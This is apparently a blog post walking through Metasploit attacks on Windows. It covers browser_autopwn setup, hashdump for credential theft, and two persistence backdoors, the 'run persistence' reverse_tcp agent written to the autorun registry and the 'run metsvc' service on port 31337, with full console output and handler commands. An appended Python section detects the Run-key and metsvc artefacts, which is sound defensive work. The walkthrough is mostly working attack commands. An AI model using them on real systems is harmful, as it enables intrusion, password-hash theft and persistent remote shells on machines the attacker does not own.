  • search autopwn

    search autopwn

     
    use server/browser_autopwn
     
    show options
     
    set LHOST 
     
    set SRVPORT
     
    set URIPATH /
     
    show options
     
    Edit the etter.conf file
    if you use ipchains
    if you use iptables
     
     
     
     
     
     
     
    After obtaining sessions
     
    run hashdump
     
    run persistence -X -i 5 -p 445 -r 192.168.1.106
     
     
    Metasploit: a couple of ways to set up a backdoor
     
    1. Scripts bundled with meterpreter
     
    Method 1. run persistence
     
    Use run persistence -h to list the options:
     
    meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 
    [*] Running Persistance Script 
    [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443
    [*] Persistent agent script is 609496 bytes long
    [+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
    [*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
    [+] Agent executed with PID 3272
    [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
    [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
    As the output shows, autostart is set up by adding a registry value, and what it launches is the VBS script backdoor.
     
    Connecting:
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LHOST 192.168.1.139 
    LHOST => 192.168.1.139 
    msf  exploit(handler) > set LPORT 443 
    LPORT => 443 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler...
    It is not started by default; after the target machine reboots, a meterpreter shell is obtained successfully.
     
    Method 2. run metsvc
     
    Run the metsvc script
     
    meterpreter > run metsvc -A 
    [*] Creating a meterpreter service on port 31337 
    [*] Creating a temporary installation directory C:\WINDOWS\TEMP\kqaqtcsWhBTbO...
    [*]  >> Uploading metsrv.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
     * Installing service metsvc
     * Starting service
    Service metsvc successfully installed. 
     
    [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
    A new service is created and set to start automatically (image name metsvc.exe, service metsvc). Connecting to the backdoor:
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LPORT 31337 
    LPORT => 31337 
    msf  exploit(handler) > set RHOST 192.168.1.108 
    RHOST => 192.168.1.108 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler... 
     
    meterpreter >
    Connected successfully
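
Both methods leave host artefacts that can be checked for: a Run-key value that launches a script from a temp directory (Method 1) and a service named metsvc with image metsvc.exe (Method 2). The Python below is an added detection example, not part of the original post; the function names, the `reg query`-style text layout, the Run value's data field and the EXAMPLEDIR path are assumptions constructed for illustration.

```python
import re

# Windows Script Host extensions; the persistence agent on this page is a .vbs file.
SCRIPT = re.compile(r"\.(vbs|vbe|jse?|wsf)\b", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
# Image names uploaded by the metsvc script in the output above.
METSVC_IMAGE = re.compile(r"(^|\\)metsvc(-server)?\.exe\b", re.IGNORECASE)
# One value line of `reg query`-style text: name, type, data separated by runs of spaces.
REG_VALUE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.+?)\s*$")


def suspicious_run_values(reg_query_text):
    """Return (value_name, data) for Run values that start a script from a temp dir."""
    hits = []
    for line in reg_query_text.splitlines():
        m = REG_VALUE.match(line)
        if not m:
            continue  # key header or blank line
        name, _type, data = m.groups()
        if TEMP_DIR.search(data) and SCRIPT.search(data):
            hits.append((name, data))
    return hits


def suspicious_services(services):
    """Return names of services that match metsvc artefacts or run from a temp dir."""
    hits = []
    for name, image_path in services:
        if (name.lower() == "metsvc" or METSVC_IMAGE.search(image_path)
                or TEMP_DIR.search(image_path)):
            hits.append(name)
    return hits


# Constructed sample. The first value reuses the value name and script path from the
# persistence output above; that the data field holds the bare path is an assumption.
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    FCBCUBtLrzFY    REG_SZ    C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""
# Constructed (service name, image path) pairs; EXAMPLEDIR is a placeholder directory.
SAMPLE_SERVICES = [
    ("metsvc", r"C:\WINDOWS\TEMP\EXAMPLEDIR\metsvc.exe"),
    ("Spooler", r"C:\WINDOWS\system32\spoolsv.exe"),
]

if __name__ == "__main__":
    print(suspicious_run_values(SAMPLE_RUN_KEY))
    print(suspicious_services(SAMPLE_SERVICES))
```

The temp-directory rule also catches a renamed service binary, which a name match on metsvc alone would miss.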
  • Original article: https://www.cnblogs.com/journeyIT/p/8259946.html